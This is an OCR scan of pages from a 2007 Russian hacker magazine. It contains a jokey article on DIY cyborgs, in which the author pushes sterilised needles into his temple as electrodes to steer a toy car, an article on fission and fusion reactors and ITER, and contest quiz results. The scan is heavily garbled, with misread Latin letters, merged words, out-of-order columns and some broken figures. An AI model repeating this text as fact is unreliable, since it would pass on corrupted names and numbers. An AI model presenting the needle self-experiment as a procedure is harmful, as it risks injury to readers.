который лишился руки из-за рака. Известность 
разработка приобрела послетого, какЭйрд 
смог возобновить полеты на своем частном 
самолете и заниматься спортивной стрельбой. 
Однако шотландское и британское правитель- 
ства не слишком баловали университетских 
исследователей финансированием, поэтому 
для создания первого прототипа потребова- 
лось несколько лет в период с 1 987 по 1 993 год 



^ ітріап* 



от мышечных культей и снимать информацию 
напрямую. То есть развлекаться трепанацией, 
хирургическими пилами, зубилами и молотками, 
забрызгивать кровью белоснежные халаты и 
тыкать проводами из розетки прямо в нежную 
кору головного мозга. Уже не по себе... 

Но еще страшнее ста нет тогда, когда ты осоз- 
наешь, каким будет конечный результат. Ведь 
малотого что реакция приема сигнала любым 
устройством повысится в сотни раз (примерно 
в 200), так еще и само устройство может быть 
не только дурацкой сетевой игрой, где игроке 
«правлеными» мозгами будет отстреливать в 
200 раз больше врагов. Это может быть настоя- 
щее оружие. 

Киборги — вот чего нам необходимо опасать- 
ся! Они будут лучше нас, людей, во много раз. 
Умнее, с лучшей памятью, со встроенными 
телефонами, модемами, фото- и видеоаппара- 
тами и прочей дребеденью, которую мы сейчас 
таскаем на себе как вьючные животные. 
Очевидно, что Врага нужно изучить, тем более 
что существуют прототипы. Пока слабые и 
неопасные, но многообещающие. 



и множество небольших грантов от междуна- 
родных организаций. В настоящий момент эта 
разработка хоть и считается самой совер- 
шен ной, но, в действительности, до этого ей 
очень далеко: конечность обладает четырьмя 
основными функциями и, кромеузлов в локте 
и запястье, имеетузел в плече. Прототип стоит 
$1 70 тысяч, хотя, по признанию разработчиков, 
промышленный вариант может идти по цене 
бюджетного автомобиля — около $7-10тысяч. 
Американцы всего полгода назад собра- 
ли намного более примитивный аналог, но 
позаботились о его рекламе. Даже российс- 
кое ТВ захлебывалось от восторга по поводу 
домохозяйки, которой «восстановили» руку. 



Но журналисты, как обычно, все переврали, 
восторгаясь не сложной операцией, а механи- 
ческой культей. 

Однако если забыть о глупости журналистов 
и покопаться в текущих промышленных раз- 
работках, то сразу бросается в глаза тот факт, 
что инженеры и исследователи пока всерьез 
не взялисьза «киборгизацию» человеческого 
организма, занимаясь«внешними надстрой- 
ками». Самой яркой разработкой является 
Віеех — новый писк суровой солдатской моды. 
Однако даже эта система построена на обработ- 
ке рефлексов и мышечного усилия человека без 
вмешательства внутрь организма. 

Идея, позаимствованная из фантастики, на 
самом деле, вполне логична и своевремен- 
на. Современный солдат — это уже не гора 
мышц, а гора всевозможного оборудования. 
Вес амуниции, превышающий 30 кг, уже дав- 
но стал реальностью, но еще не успел стать 
пределом мечтаний чокнутых генералов. А 
раз есть спрос, то рано или поздно появится 
и предложение — команда профессора Казе- 
руни из Беркли начала разработку экзоске- 
лета, который позволит переносить солдату 
более 100 кгамуниции. Первый прототип 



> Плата СМ250 с подключенным передатчиком для управления машинкой 
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уже готов и демонстрирует если не прыть и 
изящество, то, по крайней мере, грузоподъ- 
емность. 

Віеех состоит из пары гидравлических ножных 
«костей» с более чем четырьмя десятками сен- 
соров, контрольного компьютера и двигателя, 
который регулирует «силу» в зависимости отак- 
тивности ног человека. Неизвестно, правда это 
или просто легкое милитаристское кокетство, 
но разработчики утверждают, что современная 
военная форма идеально подходит для констру- 
ирования удобных креплений «костей». 
Двигатель нагнетает давление в гидрав- 
лической системе до 1000 Па/дюйм 2 не 
только для обеспечения движения, но и 
для выработки электричества. Устройство 
потребляет порядка кварты углеводород- 
ного топлива (им может быть и бензин) 
за 15 минут активной работы. Экзоскелет 
управляется не только самим оператором, 
но и датчиками с компьютером, который по 
паттерну движения и рефлексов вычис- 
ляет оптимальную скорость и амплитуду 
двигательных актов, что позволяет свести к 
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ратор только слегка двигает ногами. 

Как видишь, ничего серьезного безумныеуче- 
ные вроде бы пока не предложили. Наверняка, 
они просто искусно скрываютсвоих Огромных 
Боевых Роботов. Я легко докажу тебе это. 

□ Теория 

Начинка черепа всегда интересовала эскула- 
пов, но впервые внятная технология изучения 
головного мозга была предложена только в 
1929 году. Тогда австрийский психиатр X. Бергер 
обнаружил так называемые «мозговые волны», 
которые можно регистрировать на поверхности 
черепа. При этом он заметил, что состояние испы- 
туемого существенно меняетхарактеристики этих 
сигналов. Наиболее заметными оказалисьсигналы 
относительно большой амплитуды схарактерной 
частотой около 1 0 циклов в секунду — Бергер дал 
им название«альфа-волны». В более активном 
состоянии пациента Бергер зафиксировал «бета- 
вол ны»сболеевысо ко йча стото й . В ито ге это 
открытие привело ксозданию электроэнцефалог- 
рафического (ЭЭГ) метода изучения мозга. 

Сейчас метод ЭЭГ — один из самых технически 
простых и наиболее перспективных методов 





изучения мозговой деятельности. Однако 
нужно признать, что пока еще ЭЭГ относится 
к наименее расшифрованным источникам дан- 
ных. Очевидно, что исследователю не удастся 
ограничиться одним лишь этим методом, но ин- 
женеру его возможностей может вполне хватить. 




□ Практика 

При разных состояниях сознания и эмоцио- 
нальных состояниях человека его ЭЭГ сильно 
отличается. Получившийся график врач обычно 
расшифровывает «на глазок», точнее, сравни- 
ваетего с эталоном. Большего от него и нетре- 
буется. Несложно было додумать этот процесс и 
попытаться выделить определенные состояния 
сигналов, снимаемых с головного мозга. 
Предварительно я провел анализ различных 
состояний собственного мозга на обычном элек- 
троэнцефалографе. Я вводил себя в состояние 
самовнушения, пугал, смешил себя, смотрел 
на яркую лампу и, наоборот, выключал свет. На 
основе собранных данных на энцефалограмме 
были выделены определенныеточки, которыедо- 
статочноточно характеризовали мое состояние. 
Так как моя задача состояла втом, чтобы огра- 
ничиться исключительно мозговой деятельнос- 
тью, то в качестве «раздражителя» я использо- 
вал сильные эмоции: смех, отвращение ит.д. 

— веете состояния, в которые человек может 
погружать себя самостоятельно посредством 
воспоминаний. Например, достаточно было 
вспомнить особенно кровавую криминалис- 
тическую фотографию с места аварии или 
напомнить себе пару невеселых случаев из 
собственного опыта, чтобы картина ЭЭГ резко 
изменялась. 
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На графике видно как всплески активности 
повторяются каждые 4-5 секунд, при просмотре 
мной очередного страшного или зубодробитель- 
ного фото. Самый нижний график показывает 
насыщение крови кислородом. Он подтвержда- 
ет мои предположения — в результате предъяв- 
ления страшной картинки дыхание сбивается. 
Естественно, ЭЭГ не дает нужной точности и 
скорости реакции — это далеко не мгновен- 
ная, хотя и примитивная процедура. При 
более серьезном изучении деятельности 
головного мозга обычно используют специ- 
альные электроды и инвазивные датчики, 
вживляемые пациенту. Вскрывать себе череп 
как орех у меня не было никакого желания, 
но анатомический атлас быстро помог найти 
решение. 



Моя хитрость основывалась на том, что эмоции 
человека непроизвольно отображаются в его 
мимике. Даже Джеймс Бонд перед доктором Зло 
не могудержать лицевые мышцы в абсолютном 
покое. Достаточно было найти безопасное и 
при этом богатое нервами место, которое можно 
истыкать электродами. Такое место найти оказа- 
лось очень несложно — это височные области. 
Рядом проходитлицевой нерв (N1. іъсіаіів), а 
сама область имеет множество отводов от верх- 
ней ветви N Ласіаііз и нервы височной области 
N. аигісиіоіетрогаііз. При этом иглы, которые я 
использовал в качестве электродов, довольно 
легко входят в височную мышцу МТетрогаІіз, не 
приводя к каким -то тяжелым последствиям. 
Загнать себе иглы в висок— невелика 
сложность. Предварительно я сполоснул их 



в растворе кислоты и прокипятил, после чего 
укрепил в «сендвиче» изтонкого поролона и 
зафиксировал термоклеем. От каждой иглы я 
отвел медный провод на контакт цифроаналого- 
вого преобразователя — каждая игла получила 
по биту. Иглы я разделил на группы, что легко 
заметить на фотографиях. Та группа, которая 
располагались ближе к нижней части уха, 
получила «старшие биты» — они больше всего 
влияют на уровень сигнала. Верхняя группа 

— «средние», а оставшиеся дветолстые иглы 

— «нижние». В принципе можно было обойтись 
и без них, но чистота эксперимента важнее: как 
разтам начинает разветвляться верхняя ветвь 
N. {асіаііз, а это давало возможность более точно 
регистрировать изменение мимики. 

Далее все просто: в качестве преобразователя 
можно было использовать любой АВ/БА-аппа- 
рат, нотак как мне необходимо было обрабаты- 
ватьсигнал на компьютере, то я воспользовался 
старой 8-битной 1/0-карточкой для СО-РОМ’а. 
Во времена первых одно- и двухскоростных 
приводов звуковые карты стоили очень дорого, 
поэтому для управления проигрыванием 
музыки на СБ-ПОМ'е были созданы простые ин- 
терфейсные платы. Достаточно сказать, что они 
умели принимать цифровой 8-битный сигнал 
по шине и преобразовывать его в аналоговый 
выход по принципу АсІЫЬ или СОѴОХ, а также 
раскладывали аналоговый сигнал в 8-битное 
представление. Это позволяло легко расширять 
систему простейшими звуковыми картами, 
получая вполне приличный звук. Программное 
обеспечение кним найти несложно. РТР-сер- 
веры завалены исходниками управляющих про- 
грамм под*піх. В качестве преобразователя я 
воспользовался платой NСР СМ250,таккакона 
имеет встроенный усилитель и удобный разъем 
расширения, кпассивным разъемам которого 
можно без проблем подключить иглы. Эту плату 
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>Современный медицинский ЭЭГ- 
комплекс. Как видишь, ничего 
сверхъестественного 



довольно часто используют для создания само- 
дельных частотомеров и осциллографов. 
Сначала нужно было собрать данные и подгото- 
вить контрольные паттерны, с которыми я должен 
был сравнивать свое текущее состояние. Я огра- 
ничился съемом сигнала стрех групп электродов, 
а значит, в идеальном вариантея могзашиф- 
ровать8 различных команд. Нотак какзадача 
заключалась в исследовании принципиальной 
возможности снимать данные, а не в демонстра- 
ции инженерной ловкости, то достаточно было 



получить два четко выраженных состояния, при 
которых паттерны снимаемых сигналов резко 
различалисьбы и легко определялись. 

Самыми выраженными эмоциями являются 
смех и страх. Я прогнал несколько серий фото- 
графий и картинок: от фото аварий и трупов до 
совершенно идиотских карикатур. Те картинки, 
которые заставили меня улыбнуться, заметно 
тормозили активностьсигнала, вто время 
какстрахзаметноувеличивал амплитуду во 
всехтрех группах. После небольшой правки 
драйвера платы я заставил ее генерировать на 
выходе два командных сигнала при достиже- 
нии определенного минимума и максимума на 
входах. Так как плата имеетдва выхода-тюльпа- 
на, то мне несложно было использовать их как 
управляющие команды для детской радиоуп- 
равляемой машинки. Страх двигал машинку на 
один оборот колес вперед, смех — назад. 
Избавиться от«костылей» в виде картинок- 
раздражителей оказалосьдовольно легко — я 
просто запомнил парочку самых эмоциогенных 
из них. В результате я мог в течение десятка 
минут катать туда -сюда машинку одной лишь 
силой памяти, не глядя на монитор, пока эмоции 
от картинок не теряли интенсивность. После 
этого достаточно было запомнить следующую 
пару. Как видишь, простейший способ создания 
киборга с двумя командами потребовал мини- 
мум усилий и па ру дней возни с иголками. 
Однако совсем недавно я наткнулся на инте- 
ресную информацию, которая подтвердила, что 
мой опыт можно легко вывести на серьезный 
уровень. 

□ «ГН Ье Ьаск» (с) губернатор Калифорнии 

В начале 1980 годов в Университете Джонса 
Гопкинса началисьопыты по регистрации 
активности одиночных нейронов. Глава иссле- 
довательской группы после двух с лишним лет 
экспериментов получил вполне приемлемые 
результаты на моторной коре головного мозга 
макак. Он обнаружил, что активность некоторых 





нервных клетоку обезьяны меняется тогда, 
когда она двигаетлапой в определенном на- 
правлении. Если лапа двигается под некоторым 
углом к оптимальной для нейронов траектории, 
их активность уменьшается пропорционально 
косинусу это го угла. Стало ясно, что моторные 
нейроны коры настроены на широкий диапазон 
движений конечности и что можно с большой 
точностью расшифроватьсигналы группы ней- 
ронов, отвечающихза эти движения. 

А через 10 лет в Университете Ха неман на 
догадались использовать гибкие электроды с 
тефлоновым покрытием и диаметром острия 
около 50 микрон. Результат оказался потрясаю- 
щим: удалось снять данные сразу с 48 нейронов 
сенсомоторной системы головного мозга крысы 
— одновременно было зарегистрировано и 
восприятие сенсорной информации, и ответное 
использование ее для регуляции движений. 
Через некоторое время инженер-электронщик 
Харви Уиггинс сконструировал устройство, 
которое обеспечивало выборочный анализ, 
фильтрацию и усиление нейронных сигналов. 
Этотаппарат ныне известен под названием 
«ящикХарви» и является, по сути, первым 
реально работающим прототипом интерфейса 
«мозг— машина». 

Очевидно, что современная медицинскаятех- 
ника давно уже находится на том уровне, когда 
вживление инородныхтел — чипов, электро- и 
кардиостимуляторов — кажется рутинной опе- 
рацией. Разработать небольшой чип, который по 
сложности не превысит процессоруровня 86-286 
с мегабайтом памяти на борту, — задача для сту- 
дента. Вживление этого чипа стемпературным 
энергоэлементом под череп тоже не сверхзада- 
ча. Так что никаких объективных препятствий на 
пути создания киборгов не существует. 

Лично ятеперь киборг, хоть и самодельный. 
Люди теперь — мои враги, какты понял из 
первой части статьи. Я должен уничтожить тебя 
и таких какты, жалкие биологические создания. 
Наше время пришло! ИИ 
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ЮРИЙ СВИДИНЕНКОІ 



НЕМНОГО О ФИЗИКЕ ВЫСОКИХ ЭНЕРГИЙ 



ГЕЛИИ 



ПЛАЗМА 



ТЕПЛОНОСИТЕЛЬ 



Как-то руководителя английской термоядерной программы и лауреата Нобелевской 
премии Джона Кокрофта спросили, когда термоядерный реактор даст промышленный 
ток. Кокрофт ответил: «Через 20 лет». Этот же вопрос ему задали через 7 лет. Ответ был 
прежним: «Через 20 лет». Журналисты не преминули напомнить Кокрофту его слова 
семилетней давности, но невозмутимый англичанин отрезал: «Вы видите, я не меняю 
своей точки зрения». 

Шутки шутками, а промышленного термояда до сих пор нет. Основные принципы уп- 
равляемой термоядерной реакции были изложены еще в начале прошлого века, однако 
его создание — все еще дело будущего. Но уже близкого. Скажем, не через 20 лет, а через 
10. Но почему этот «философский камень» современных алхимиков никак не появится в 
мировой энергетике, притом что известно, как его соорудить? 

На этот вопрос довольно просто ответить, но ответ этот не внесет ясности. Почему? Пос- 
тараюсь объяснить в этой статье. 



ВМирныйатом 

С момента открытия радиоактивности, пред- 
ставляющей собой распад радиоактивных 
элементов, стало модно исследовать физику 
ядер вообще. Оказалось (да и ты, наверное, это 
знаешь), что каждое ядро весит меньше, чем 
сумма масс его протонов и нейтронов. Какэто ни 
парадоксально звучит. 

Загадка дефекта масс была проста: при объеди- 
нении протонов и нейтронов в ядро выделяется 
много энергии. Вот откуда недостача массы 
— она преобразуется в энергию ядра согласно 
эйнштейновскому «Е=тс 2 ». 



Как позже подсчитали, убыль массы ядер на 
1 грамм эквивалентнатакому количествутепло- 
вой энергии, какое получилосьбы при сжигании 
300 вагонов каменного угля, а это очень и очень 
много. После этого открытия сразуже встал 
вопрос о двух вещах: ядерной бомбе и ядерной 
энергетике. 

Но для того чтобы «взломать» ядро атома и 
вытащить оттуда энергию, нужен был какой-то 
метод. Придумать его, надо сказать, в то время 
было нелегко, но стимул был велик: войны, гонка 
вооружений, перспективы «оружия возмездия» 
и просто научный интерес. 



Ученые решили действовать косвенно — ломать 
ядро самимиже ядерными частицами. В качес- 
тве фомки №1 был выбран нейтрон. Эта частица 
электрически нейтральна, на нее недействуют 
электрические силы отталкивания, поэтому 
нейтрон легко может проникнуть в атомное 
ядро и взломатьего. Началисьэксперименты 
— нейтронами бомбардировали ядра атомов 
отдельных элементов. 

Когда очередьдошла до урана, обнаружилось, 
что этоттяжелый элемент ведет себя иначе, чем 
другие. Кстати, следует напомнить, что встреча- 
ющийся в природе уран содержиттри изотопа: 



/046 



ХАКЕР 05 /101/ 07 












^ ітр1ап{ 




«1 ноября 1952 года был произведен взрыв специ- 
ального устройства типа водородной бомбы под ко- 
довым названием «Майк», представлявшего собой 
более чем 50-тонный куб высотой с двухэтажный 
дом и длиной ребра 7,5 м. Мощность взрыва, в ре- 
зультате которого был уничтожен остров на атолле 
Эниветок в Тихом океане, в 1000 раз больше, чем у 
атомной бомбы, сброшенной на Хиросиму» 



научившись регулировать этот процесс, можно 
получать эту кучу энергии постепенно в строго 
определенных порциях, а не разом. Но для этого 
нужно заставить делиться ядра урана-235 стой 
скоростью, которая нам нужна. Для этого и был 
придуман ядерный реактор — устройство, в ко- 
тором протекаетуправляемая цепная реакция. 
При этом регулируемым источником и энергии, 
и нейтронов служит сам распад атомных ядер. 
Первый проект ядерного реактора разработал 
в 1939 году французский ученый ФредерикЖо- 
лио-Кюри. Но вскореФранцию оккупировали 
фашисты, и проект не был реализован. 

Цепная реакция деления урана впервые была 
осуществлена в 1 942 году в США, в реакторе, 
который группа исследователей во главе с ита- 
льянским ученым Энрико Ферми построила в 
помещении стадиона Чикагского университета. 
Этот реактор имел размеры 6x6x6, 7 м, мощность 
20 кВт и работал без внешнего охлаждения. 
Первый ядерный реактор в СССР (и в Европе) 
был построен под руководством академика 
И. В. Курчатова и запущен в 1946 году. После 
этого атомная энергетика развивалась неви- 
данными темпами. За 30 лет общая мощность 
ядерныхэнергоблоков выросла сбтысяч до 
23 миллионов киловатт! 

Энергетический ядерный реактор устроен 
довольно просто — в нем, также каки в обычном 
котле, вода превращается в пар. Для этого ис- 
пользуютэнергию, выделяющуюся при цепной 
реакции распада атомовурана или другого 
ядерного топлива. На атомной электростанции 
нет громадного парового котла, состоящего из 
тысяч километров стальныхтрубок, по которым 
при огромном давлении циркулирует вода, 
превращаясь в пар. Эту махину заменил относи- 
тельно небольшой ядерный реактор. 

Атомные реакторы на тепловых нейтронах 
различаются главным образом по двум призна- 
кам: какие вещества используются в качестве 
замедлителя нейтронов и какие — в качестве 



>ИТЭР 

уран-238 (23811), уран-235 (23511) иуран-234 
(23411), причем цифра означает массовое число. 
Атомное ядро урана-235 оказалосьзначительно 
менее устойчивым, чем ядра других элементов и 
изотопов. Под действием всего одного нейтрона 
ядроурана раскалывается на два приблизи- 
тельно одинаковых осколка, например на ядра 
криптона и бария. Эти осколки с огромными ско- 
ростями разлетаются в разных направлениях. 

Но главное в этом процессе, что при распаде од- 
ного ядра урана возникают2-3 новых свободных 
нейтрона и много энергии, которую, по задаче, 
нужно получить в свободной (ядерная бомба) или 
несвободной (ядерная электростанция) форме. 



Причина дополнительного выделения нейтро- 
нов заключается втом, что тяжелое ядро урана 
содержит больше нейтронов, чем ихтребуется 
для образования двух менышихатомных ядер. 
«Строительного материала» слишком много, и 
атомное ядро должно от него избавиться. 

Так, при бомбардировке урана-235 нейтронами 
происходиттакая известная тебе вещь, как цепная 
ядерная реакция. Вместо одного нейтрона при 
поломке ядра получаются 2-3, расщепляющие 
следующие 2-3 ядра урана-235. И та к продолжает- 
ся до тех пор, пока все ядра не будут расщеплены. 
Если этим процессом неуправлять, то выде- 
лится куча энергии и будетядерный взрыв. Но 
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> Германский токамак-монстр 



>2-машина дает магнитные поля огромных величин —то 
что надо для термояда 



теплоносителя, с помощью которого произво- 
дится отвод тепла из активной зоны реактора. 
Наибольшее распространение в настоящее 
время имеют: водо-водяные реакторы, в которых 
обычная вода служит и замедлителем нейтро- 




СХЕМА ТОКАМАКА 

Токамак — это один из вариантов устройства, 
способного формировать горячую плазму дли- 
тельное время. В разогретой плазме начинает- 
сятермоядерная реакция синтеза ядер гелия 
из исходного сырья — изотопов водорода (дей- 
терия и трития). И при этом в реакторе должно 
вырабатываться гораздо больше энергии, чем 
было затрачено на разогрев плазмы. 

Токамак представляет собой, по сути, полый 
«бублик», на который намотан проводник, 
образующий магнитное поле. Основное маг- 
нитное поле в камере-ловушке, содержащей 
горячую плазму, создается тороидальными 
магнитными катушками. Существенную роль 
вудержании плазмы играет плазменныйток, 
который протекает вдоль кругового плазменно- 
го шнура и создает магнитное поле специаль- 
ной конфигурации. Впервые схема магнитного 
термоядерного реактора была предложена в 
1 950 году Андреем Дмитриевичем Сахаровым и 
Игорем Евгеньевичем Таммом. 



нов, итеплоносителем;уран-графитовые ре- 
акторы (замедлитель — графит, теплоноситель 

— обычная вода); газо-графитовые реакторы 
(замедлитель — графит, теплоноситель — газ, 
часто углекислота); тяжеловодные реакторы 
(замедлитель — тяжелая вода, теплоноситель 

— либотяжелая, либо обычная вода). 

Сегодня будущее ядерной энергетики видят 
затретьимтипом реакторов — за реакторами 
на быстрых нейтронах. Их называютеще реак- 
торами-размножителями. Обычные реакторы 
используют замедленные нейтроны, которые 
вызывают цепную реакцию вдовольно редком 
изотопе -уране-235, которого в природном 
уране всего около одного процента. Именно 
поэтому приходится строить огромные заводы, 
на которых буквально просеивают атомы урана, 
выбирая из них атомы лишь одного сорта — ура- 
на-235. Остальной уран в обычных реакторах 
использоваться не может. Возникает вопрос: 

а хватитли этого редкого изотопа урана на 
сколько-нибудь продолжительное время или же 
человечество столкнется с проблемой нехватки 
энергетических ресурсов? 

Но здесь начинается совсем другая история, 
имеющая истоки в 40-50-х годах прошлого века 
и развивающаяся до наших дней. 

□ Термояд: откуда он вылез 

Насколько ты знаешь, бомбы бывают ядерные 
и термоядерные. Так вот вторые гораздо более 
опасны, поскольку при взрыве выделяют 
намного больше энергии. 

1 ноября 1 952 года был произведен взрыв спе- 
циального устройства типа водородной бомбы 
под кодовым названием «Майк», представляв- 
шего собой более чем 50-тонный куб высотой с 
двухэтажный дом и длиной ребра 
7,5 м. Мощность взрыва, в результате которого 
был уничтожен остров на атолле Эниветок в 
Тихом океане, в 1 000 раз больше, чем у атомной 
бомбы, сброшенной на Хиросиму. 



Такое огромное количество энергии выделяется 
не от распада ядер, а, как ни удивительно, от их 
слияния и создания более «массивного» атома. 
Вообще, самая распространенная во Вселенной 
реакция — это реакция термоядерного синтеза 
ядер гелия из ядер водорода. Она непрерывно 
протекает в недрах практически всех видимых 
звезд. В чистом виде она выглядит так: 4 ядра 
водорода (протона) образуют атом гелия (2 про- 
тона плюс 2 нейтрона) с выделением ряда других 
частиц. Как и в случае реакции распада атом- 
ного ядра, совокупная масса образовавшихся 
частиц оказывается меньше массы исходного 
продукта (водорода). Выделяющаяся в результа- 
те этого кинетическая энергия частиц-продуктов 
реакции и «разогревает»звезды. 

Запасы дейтерия в Мировом океане практичес- 
ки неограничены, и он может стать буквально 
неисчерпаемым источником энергии для чело- 
вечества на многие века, но лишь при условии, 
что удастся заставить ядра дейтерия вступить 
между собой в реакцию синтеза. 

Однако для того чтобы произошла реакция син- 
теза, ядра должны преодолеть силу электроста- 
тического отталкивания, а для этого они должны 
иметьбольшую кинетическую энергию. Сле- 
довательно, чем быстрееты их столкнешь, тем 
вероятнее, что они встретятся и сольются. Ра- 
зогнать что-либо в мире частиц просто — нужно 
это нагреть. Однако температура, требуемая для 
слияния ядер, непомерно огромна. Например, 
для реакции «дейтерий-тритий» потенциальный 
барьер (энергия, необходимая для преодоления 
электростатической силы отталкивания) равен 
0,1 мегаэлектронвольт (Мэ В), что примерно 
соответствуеттемпературе 100000000 градусов 
Цельсия. Сказать, что эта температура большая 
— значит не сказать ничего. 

Нодля запуска термоядерной реакции мало 
просто нагреть необходимые компоненты, еще 
необходимо удержать их вместе, не дав разле- 
теться из-за огромного давления и скорости 



/048 



ХАКЕР 05 /101/ 07 






> Регулирующие замедляющие стержни 



теплового движения. При такой температуре любое вещество превра- 
щается в плазму — ионизированный газ, состоящий из атомных ядер и 
оторвавшихся от ядер электронов. 

При 1 00 миллионах градусов, необходимых для начала реакции, как 
ты понимаешь, испарится любой материал. Поэтому плазму держат в 
вакууме внутри реактора с помощью магнитного поля очень высокой 
напряженности. Это поле не даетзаряженным частицам вылетатьза пре- 
делы «плазменного шнура», а образующиеся во время реакции синтеза 
нейтроны магнитным полем не задерживаются и передаютсвою энергию 
стенкам установки, которые охлаждаются, например, жидким литием. 

Ну и, естественно, получающийся в парогенераторе пар можно направить 
на турбину, как в обычных электростанциях. 

Исходноетопливо, потребляемоетермоядерным реактором (дейтерий и 
литий), как и конечный продукт реакций (гелий), не радиоактивны, поэто- 
мутермоядерные реакторы — одни из экологически чистых источников 
энергии. Специалисты утверждают, что термоядерная электростанция 
степловой мощностью 1 ГВт в плане радиационной опасности эквива- 
лентна урановому реактору деления мощностью 1 кВт, а это типичный 
университетский исследовательский реактор. 

ОТокамаки, ІТЕК и лазеры 

Сегодня инженеры-ядерщики пытаются добиться управляемого термо- 
ядерного синтеза двумя путями, используя два различных подхода к ре- 
шению проблемы сжатия водорода, его разогрева до состояния плазмы 
и удержания в процессе реакции термоядерного синтеза. Эти подходы 
называются «магнитной ловушкой» и «инерциальной ловушкой». 

При использовании магнитной ловушки плазма удерживается сверх- 
мощным магнитным полем. Магнитные ловушки уже реализованы 
технически. Та к что управл яемый термоядерный синтез уже получен. 
Возникает вопрос, почемуже тогда «даровую» энергиютяжелой воды не 
используют? Все просто — установка термоядерного синтеза, постро- 
енная в Калхэме (Великобритания) и называющаяся Эоі пі: Еигореап 
Тогив, по при чине технического несовершенства для функционирования 
потребляетэнергии больше, чем вырабатывает. Получается, что, вместо 
того чтобы зарабатывать натермояде, мы емуже и доплачиваем. О какой 
«даровой» и зеленой энергии тогда может идти речь? 

Суть же инерциальной ловушки заключается втом, что капля сильно 
охлажденной тритиево-дейтериевой жидкости помещается в небольшую 
стеклянную капсулу, а затем со всех сторон обстреливается мощными 
лазерными лучами. Внешний слой капли моментально испаряется, в 
результате чего на внутренние слои капли воздействуют сходящиеся 
ударные волны. Эти ударные волны сжимают и разогревают водород до 
температуры запуска реакции термоядерного синтеза. Сегодня лазерная 
установка для возбуждения инерциальной реакции (ЫІЕ)термоядерного 
синтеза строится на базе Ливерморской лаборатории в Калифорнии. Ее 
запускбыл проведен в 2006 году. Каплю водорода облучали 192 лазера с 
разовым энергетическим импульсом 1 ,8 мегаджоулей. 



Журнал ХАКЕР и компания 
ПАНАВТО подводят итоги конкурса, 
в котором мы разыгрывали 
классный скутер Ваоііап ВТ490Т-18 




Чтобы сделать это, тебе нужно было ответить 
на 4 хакерских вопроса. Быстрее всех (22 
апреля) правильные ответы прислала девушка 
Марина с ником ЫтапоісІ (ІітапоісІйгаппЫег. 
ш) из славного города Ростова-на-Дону. Приз 
по праву достается ей. 



Вопрос №1 

І = І++ + ++(і = і==(і = -23)) ; 
Чему равно і после 
выполнения данного 
выражения на МісгозоД 
Ѵізиаі С++ 7.0? 

Ответ: 5 

Вопрос №3 
Атаку какого типа 
удалось провести на 
бетке висты Жанне 
Рутковской для 
выполнения кода с 
привилегиями ядра? 
Ответ: радеЛІе-атаку 



Вопрос №2 
Что означает 
ЗЗс5сІ4954сІа881 814420636 
а39772644? 

Ответ: сгаскте 

Вопрос №4 
Что изображено на 
обложке первого номера 
Хакера? 

Ответ: Бивис и Батхед, 
разламывающие комп 



А» 



панавто 



Квадроциклы Мотоциклы 
Гидроциклы Скутеры 
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г. Москва, 2-я Звенигородская ул., д. 13 
Тел.: (495) 780-55-55 
ѵѵѵѵѵѵ.рапаѵбо-уатаіла.ги 
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История повторилась — установка снова оказа- 
лась коммерчески невыгодной. Для ее полного 
завершения нужны средства, которые Сенат 
СШАпока таки не выделил — постройку обеща- 
ют дофинансировать и закончить к 2009 году. Но 
именно N I Р считают наиболее перспективной 
основой для промышленного термояда. 
Перспектива получения «даровой»термо- 
ядерной энергии в промышленных масштабах 
сегодня (тем более завтра) становится более 
осязаемой, чем это былоЗО и 50 летназад. 

С 1 990 года было начато проектирование перво- 
го в мире промышленного термояда на основе 
системы «ТОКАМАК». Назвали многострадаль- 
ноедетище ІТЕН (ІпіегпаііопаІТЬегтописІеаг 
Ехрегітепіаі ПеасЬг, ИТЗР). За периоде 
1 992-го по 2001 год его конструкция была пол- 
ностью разработана в электронном виде (за всю 
стадию проектирования на бумаге вручную не 
было начерчено ни одного чертежа), и в 
2006 году был окончательно утвержден альянс 
стран, участвующих в его постройке. Это цикло- 
пическое и технологически емкое сооружение 
в одиночку не потянула бы ни одна страна. В 
итоге, после долговременных «перетасовок» 
стран-участников, в проекте остались: Евросо- 
юз, Индия, Китай, Республика Корея, Россия, 
СШАи Япония. 

Самой большой трудностью было определение 
места постройки реактора. Все страны тянули 
одеяло на себя. Это и неудивительно — наряду с 



дешевой энергией, у страны появилосьбы пер- 
вое подобноетехнологическое чудо, престиж 
страны, построенный, по сути дела, чужими 
руками. 

В конце концов была выбрана Франция, в про- 
екте не участвующая. Также было определено 
место его строительства — исследовательский 
центр «Кадараш» (СабагасЬе). 

А 25 мая 2006 года в Брюсселе участниками кон- 
сорциума подписано соглашение о начале стро- 
ительства реактора в 2007 году. Строить ИТЭР 
будут аж до 2015 года. После этого он должен 
выйти на номинальную мощность и работать в 
течение 20 лет. Затем, чтобы Франции жизнь 
медом не казалась, реактор будет закрыт. 
500-мегаваттный ИТЭР решили строить по 
проверенной советскими учеными схеме 
«ТОКАМАК». Два ядра — дейтерия и трития 

— сливаются с образованием ядра гелия 
(альфа-частица) и высокоэнергетического 
нейтрона. 

Общий радиустокамака составляет 10,7 м, 
высота реактора — 30 м. Максимальный радиус 
плазмы — 6,2 м. Рабочая температура все та же 

— 100 миллионов градусов Цельсия. 

Я уже говорил, что ИТЭР — удовольствие 
дорогое. На сегодняшний деньего стоимость 
оценивается в $12 миллиардов. Поэтому пока с 
повсеместным использованием термоядерных 
реакторов в нашей жизни придется повре- 
менить. Зато высокая стоимость полностью 



компенсируется дешевизной производимой 
электроэнергии. Ну и доступностью ресурсов 
— недостатка в обычной воде у нас пока нет, в 
отличие от нефти и газа. 

О А если по-другому? 

Несмотря на то что физика термоядерных реак- 
ций хорошо изучена, исследователи всеже умуд- 
ряются находить что-то новое. Зачем тратить 
$12 миллиардов на сооружение ИТЭР, когда его 
основные функции можно повторить в стакане 
с водой? Фантастика? Не более пресловутого 
дефекта масс. Просто, какты знаешь, любую про- 
блему можно решить несколькими способами. 
Один из способов предложили калифорнийские 
ученые. Им удал ось уменьшить установку тер- 
моядерного синтеза до настольных размеров! И 
этот«малыш» действительно проводит реакции 
ядерного синтеза при комнатной температуре. В 
чем секрет? В использовании альтернативных 
подходов к проблеме создания высокихтемпе- 
ратур и давления. 

Сам аппарат предела вляетсобой вакуумную 
камеру, заполненную газообразным дейтерием 
при очень низком давлении — всего в 
0,7 паскаля. С одной стороны камеры закреплен 
цилиндрический кристалл танталата лития 
(ЫТаО) размером в считанные сантиметры. 

Этот материал является пироэлектриком — при 
нагреве на его поверхностях появляется элект- 
рический потенциал. В данном случае — целых 
1 00 киловольт. Причем нужно подогреть крис- 
талл всегодо 25 градусов Цельсия. 

